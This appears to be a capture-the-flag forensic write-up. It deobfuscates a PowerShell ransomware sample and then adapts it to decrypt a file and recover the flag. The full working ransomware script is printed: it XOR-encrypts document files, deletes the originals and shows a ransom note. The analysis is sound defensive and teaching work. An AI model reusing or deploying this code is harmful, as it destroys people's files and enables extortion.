exegol-forensic Logs $ echo -ne 'Ki50eHQgKi5kb2MgKi5kb2N4ICoucGRm' | base64 -d
*.txt *.doc *.docx *.pdf#
exegol-forensic Logs $ echo -ne 'LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpZT1VSIEZJTEVTIEhBVkUgQkVFTiBFTkNSWVBURUQgQlkgQSBSQU5TT01XQVJFCiogV2hhdCBoYXBwZW5lZD8KTW9zdCBvZiB5b3VyIGZpbGVzIGFyZSBubyBsb25nZXIgYWNjZXNzaWJsZSBiZWNhdXNlIHRoZXkgaGF2ZSBiZWVuIGVuY3J5cHRlZC4gRG8gbm90IHdhc3RlIHlvdXIgdGltZSB0cnlpbmcgdG8gZmluZCBhIHdheSB0byBkZWNyeXB0IHRoZW07IGl0IGlzIGltcG9zc2libGUgd2l0aG91dCBvdXIgaGVscC4KKiBIb3cgdG8gcmVjb3ZlciBteSBmaWxlcz8KUmVjb3ZlcmluZyB5b3VyIGZpbGVzIGlzIDEwMCUgZ3VhcmFudGVlZCBpZiB5b3UgZm9sbG93IG91ciBpbnN0cnVjdGlvbnMuCiogSXMgdGhlcmUgYSBkZWFkbGluZT8KT2YgY291cnNlLCB0aGVyZSBpcy4gWW91IGhhdmUgdGVuIGRheXMgbGVmdC4gRG8gbm90IG1pc3MgdGhpcyBkZWFkbGluZS4KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQo' | base64 -d
-------------------------------------------------------------------------------------------------
YOUR FILES HAVE BEEN ENCRYPTED BY A RANSOMWARE
* What happened?
Most of your files are no longer accessible because they have been encrypted. Do not waste your time trying to find a way to decrypt them; it is impossible without our help.
* How to recover my files?
Recovering your files is 100% guaranteed if you follow our instructions.
* Is there a deadline?
Of course, there is. You have ten days left. Do not miss this deadline.
-------------------------------------------------------------------------------------------------
We are facing a ransomware. The first variable may be used to select the files to encrypt that match these extensions. Let’s rename our variable :
$extension = "Ki50eHQgKi5kb2MgKi5kb2N4ICoucGRm"
$message = "LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpZT1VSIEZJTEVTIEhBVkUgQkVFTiBFTkNSWVBURUQgQlkgQSBSQU5TT01XQVJFCiogV2hhdCBoYXBwZW5lZD8KTW9zdCBvZiB5b3VyIGZpbGVzIGFyZSBubyBsb25nZXIgYWNjZXNzaWJsZSBiZWNhdXNlIHRoZXkgaGF2ZSBiZWVuIGVuY3J5cHRlZC4gRG8gbm90IHdhc3RlIHlvdXIgdGltZSB0cnlpbmcgdG8gZmluZCBhIHdheSB0byBkZWNyeXB0IHRoZW07IGl0IGlzIGltcG9zc2libGUgd2l0aG91dCBvdXIgaGVscC4KKiBIb3cgdG8gcmVjb3ZlciBteSBmaWxlcz8KUmVjb3ZlcmluZyB5b3VyIGZpbGVzIGlzIDEwMCUgZ3VhcmFudGVlZCBpZiB5b3UgZm9sbG93IG91ciBpbnN0cnVjdGlvbnMuCiogSXMgdGhlcmUgYSBkZWFkbGluZT8KT2YgY291cnNlLCB0aGVyZSBpcy4gWW91IGhhdmUgdGVuIGRheXMgbGVmdC4gRG8gbm90IG1pc3MgdGhpcyBkZWFkbGluZS4KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQo="
The next 4 variables don’t help to have a better understanding, so for now we will not rename them. The function n90Vp is only used to print the warning message, we can rename it :
function printMessage {
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($message))
}
The function l56Vn use the function a12Vc to decode a the base64 encoded extensions and return a table using Split(" "), let’s rename them :
function split_extensions {
return (decode_b64 $extensions).Split(" ")
}
function decode_b64 {
param([string]$base64_encode)
return [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($base64_encode))
}
The function l34Vn seems to use xor. It may be the function used to encrypt our file. Let’s rename it:
function xor {
param([byte[]]$m56Vo, [byte[]]$n78Vp, [byte[]]$o90Vq)
$p12Vr = [byte[]]::new($m56Vo.Length)
for ($x = 0; $x -lt $m56Vo.Length; $x++) {
$q34Vs = $n78Vp[$x % $n78Vp.Length]
$r56Vt = $o90Vq[$x % $o90Vq.Length]
$p12Vr[$x] = $m56Vo[$x] -bxor $q34Vs -bxor $r56Vt
}
return $p12Vr
}
The function 012Vq seems to be the main function. It loops inside the table where the extensions are stored, then it take a path declared inside the variable d34Vp and use the powershell builtin function Test-Path to see if it exists. If it’s True, it retrieve all the files of this path with the builtin function Get-ChildItem and checks the file extensions. If the extensions corresponds to these in the table, it retrieve the full name of the file and again test if it exists. After that, it open the file and read it’s content using [IO.File]::ReadAllBytes() and call the function s78Vu which seems to use the xor function to encrypt the files. Once done, the extensions are modifie to .secured and it deletes the original files.
Here is the function renamed :
function Main {
param([switch]$p34Vr)
try {
if ($p34Vr) {
foreach ($ext in split_extensions) {
$path = "dca01aq2/"
if (Test-Path $path) {
Get-ChildItem -Path $path -Recurse -ErrorAction Stop |
Where-Object { $_.Extension -match "^\.$ext$" } |
ForEach-Object {
$file = $_.FullName
if (Test-Path $file) {
$file_content = [IO.File]::ReadAllBytes($file)
$encrypted_content = Encrypt $file_content $key1 $key2
[IO.File]::WriteAllText("$file.secured", $encrypted_content)
Remove-Item $file -Force
}
}
}
}
}
}
The full script with the most part of it renamed is here :
$extensions = "Ki50eHQgKi5kb2MgKi5kb2N4ICoucGRm"
$message = "LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpZT1VSIEZJTEVTIEhBVkUgQkVFTiBFTkNSWVBURUQgQlkgQSBSQU5TT01XQVJFCiogV2hhdCBoYXBwZW5lZD8KTW9zdCBvZiB5b3VyIGZpbGVzIGFyZSBubyBsb25nZXIgYWNjZXNzaWJsZSBiZWNhdXNlIHRoZXkgaGF2ZSBiZWVuIGVuY3J5cHRlZC4gRG8gbm90IHdhc3RlIHlvdXIgdGltZSB0cnlpbmcgdG8gZmluZCBhIHdheSB0byBkZWNyeXB0IHRoZW07IGl0IGlzIGltcG9zc2libGUgd2l0aG91dCBvdXIgaGVscC4KKiBIb3cgdG8gcmVjb3ZlciBteSBmaWxlcz8KUmVjb3ZlcmluZyB5b3VyIGZpbGVzIGlzIDEwMCUgZ3VhcmFudGVlZCBpZiB5b3UgZm9sbG93IG91ciBpbnN0cnVjdGlvbnMuCiogSXMgdGhlcmUgYSBkZWFkbGluZT8KT2YgY291cnNlLCB0aGVyZSBpcy4gWW91IGhhdmUgdGVuIGRheXMgbGVmdC4gRG8gbm90IG1pc3MgdGhpcyBkZWFkbGluZS4KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQo="
$encoded_key1 = "NXhzR09iakhRaVBBR2R6TGdCRWVJOHUwWVNKcTc2RWl5dWY4d0FSUzdxYnRQNG50UVk1MHlIOGR6S1plQ0FzWg=="
$encoded_key2 = "n2mmXaWy5pL4kpNWr7bcgEKxMeUx50MJ"
$e90Vg = @{}
$f12Vh = @{}
For ($x = 65; $x -le 90; $x++) {
$e90Vg[([char]$x)] = if($x -eq 90) { [char]65 } else { [char]($x + 1) }
}
function printMessage {
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($message))
}
function split_extensions {
return (decode_b64 $extensions).Split(" ")
}
For ($x = 97; $x -le 122; $x++) {
$e90Vg[([char]$x)] = if($x -eq 122) { [char]97 } else { [char]($x + 1) }
}
function decode_b64 {
param([string]$base64_encode)
return [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($base64_encode))
}
$key1 = decode_b64 $encoded_key1
$key2 = decode_b64 $encoded_key2
For ($x = 48; $x -le 57; $x++) {
$e90Vg[([char]$x)] = if($x -eq 57) { [char]48 } else { [char]($x + 1) }
}
$e90Vg.GetEnumerator() | ForEach-Object {
$f12Vh[$_.Value] = $_.Key
}
function xor {
param([byte[]]$m56Vo, [byte[]]$n78Vp, [byte[]]$o90Vq)
$p12Vr = [byte[]]::new($m56Vo.Length)
for ($x = 0; $x -lt $m56Vo.Length; $x++) {
$q34Vs = $n78Vp[$x % $n78Vp.Length]
$r56Vt = $o90Vq[$x % $o90Vq.Length]
$p12Vr[$x] = $m56Vo[$x] -bxor $q34Vs -bxor $r56Vt
}
return $p12Vr
}
function Encrypt {
param([byte[]]$t90Vv, [string]$u12Vw, [string]$v34Vx)
if ($t90Vv -eq $null -or $t90Vv.Length -eq 0) {
return $null
}
$y90Va = [System.Text.Encoding]::UTF8.GetBytes($u12Vw)
$z12Vb = [System.Text.Encoding]::UTF8.GetBytes($v34Vx)
$a34Vc = xor $t90Vv $y90Va $z12Vb
return [Convert]::ToBase64String($a34Vc)
}
function Main {
param([switch]$p34Vr)
try {
if ($p34Vr) {
foreach ($ext in split_extensions) {
$path = "dca01aq2/"
if (Test-Path $path) {
Get-ChildItem -Path $path -Recurse -ErrorAction Stop |
Where-Object { $_.Extension -match "^\.$ext$" } |
ForEach-Object {
$file = $_.FullName
if (Test-Path $file) {
$file_content = [IO.File]::ReadAllBytes($file)
$encrypted_content = Encrypt $file_content $key1 $key2
[IO.File]::WriteAllText("$file.secured", $encrypted_content)
Remove-Item $file -Force
}
}
}
}
}
}
catch {}
}
if ($env:USERNAME -eq "developer56546756" -and $env:COMPUTERNAME -eq "Workstation5678") {
Main -p34Vr
printMessage
}
Here is a scheme where I tried to represent the flow of the ransomware :
We have now a good understanding of what is happening. We have an encrypted file map.file.secured and the script used to encrypt it. as it’s a xor encryption, and it seems that here is no random value added to the key, we can use the same function to decrypt the file.
First, we need to modify it a little bit. We need to delete the if condition that checks the username and computername, and we also have to modify the path to correspond to the one where our encrypted file is. Finally, we need to modify the base64 encoded extensions, to match .secured. Here is the final script :
$extensions = "Ki5zZWN1cmVk"
$message = "LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpZT1VSIEZJTEVTIEhBVkUgQkVFTiBFTkNSWVBURUQgQlkgQSBSQU5TT01XQVJFCiogV2hhdCBoYXBwZW5lZD8KTW9zdCBvZiB5b3VyIGZpbGVzIGFyZSBubyBsb25nZXIgYWNjZXNzaWJsZSBiZWNhdXNlIHRoZXkgaGF2ZSBiZWVuIGVuY3J5cHRlZC4gRG8gbm90IHdhc3RlIHlvdXIgdGltZSB0cnlpbmcgdG8gZmluZCBhIHdheSB0byBkZWNyeXB0IHRoZW07IGl0IGlzIGltcG9zc2libGUgd2l0aG91dCBvdXIgaGVscC4KKiBIb3cgdG8gcmVjb3ZlciBteSBmaWxlcz8KUmVjb3ZlcmluZyB5b3VyIGZpbGVzIGlzIDEwMCUgZ3VhcmFudGVlZCBpZiB5b3UgZm9sbG93IG91ciBpbnN0cnVjdGlvbnMuCiogSXMgdGhlcmUgYSBkZWFkbGluZT8KT2YgY291cnNlLCB0aGVyZSBpcy4gWW91IGhhdmUgdGVuIGRheXMgbGVmdC4gRG8gbm90IG1pc3MgdGhpcyBkZWFkbGluZS4KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQo="
$encoded_key1 = "NXhzR09iakhRaVBBR2R6TGdCRWVJOHUwWVNKcTc2RWl5dWY4d0FSUzdxYnRQNG50UVk1MHlIOGR6S1plQ0FzWg=="
$encoded_key2 = "n2mmXaWy5pL4kpNWr7bcgEKxMeUx50MJ"
$e90Vg = @{}
$f12Vh = @{}
For ($x = 65; $x -le 90; $x++) {
$e90Vg[([char]$x)] = if($x -eq 90) { [char]65 } else { [char]($x + 1) }
}
function printMessage {
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($message))
}
function split_extensions {
return (decode_b64 $extensions).Split(" ")
}
For ($x = 97; $x -le 122; $x++) {
$e90Vg[([char]$x)] = if($x -eq 122) { [char]97 } else { [char]($x + 1) }
}
function decode_b64 {
param([string]$base64_encode)
return [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($base64_encode))
}
$key1 = decode_b64 $encoded_key1
$key2 = decode_b64 $encoded_key2
For ($x = 48; $x -le 57; $x++) {
$e90Vg[([char]$x)] = if($x -eq 57) { [char]48 } else { [char]($x + 1) }
}
$e90Vg.GetEnumerator() | ForEach-Object {
$f12Vh[$_.Value] = $_.Key
}
function xor {
param([byte[]]$m56Vo, [byte[]]$n78Vp, [byte[]]$o90Vq)
$p12Vr = [byte[]]::new($m56Vo.Length)
for ($x = 0; $x -lt $m56Vo.Length; $x++) {
$q34Vs = $n78Vp[$x % $n78Vp.Length]
$r56Vt = $o90Vq[$x % $o90Vq.Length]
$p12Vr[$x] = $m56Vo[$x] -bxor $q34Vs -bxor $r56Vt
}
return $p12Vr
}
function Encrypt {
param([byte[]]$t90Vv, [string]$u12Vw, [string]$v34Vx)
if ($t90Vv -eq $null -or $t90Vv.Length -eq 0) {
return $null
}
$y90Va = [System.Text.Encoding]::UTF8.GetBytes($u12Vw)
$z12Vb = [System.Text.Encoding]::UTF8.GetBytes($v34Vx)
$a34Vc = xor $t90Vv $y90Va $z12Vb
return [Convert]::ToBase64String($a34Vc)
}
function Main {
param([switch]$p34Vr)
try {
if ($p34Vr) {
foreach ($ext in split_extensions) {
$path = "C:/Users/fadoli/Downloads"
if (Test-Path $path) {
Get-ChildItem -Path $path -Recurse -ErrorAction Stop |
Where-Object { $_.Extension -match "^\.$ext$" } |
ForEach-Object {
$file = $_.FullName
if (Test-Path $file) {
$file_content = [IO.File]::ReadAllBytes($file)
$encrypted_content = Encrypt $file_content $key1 $key2
[IO.File]::WriteAllText("$file.pdf", $encrypted_content)
}
}
}
}
}
}
catch {}
}
Main -p34Vr
Before using the script to decrypt our file, we need to base64 decode map.file.secured. We can do it with Cyberchef :
Once our script has been executed, we can see a file with .pdf extensions which is decrypted :
Our final step, before opening the file, we need, again, to decode it with cyberchef and we can retrieve the flag :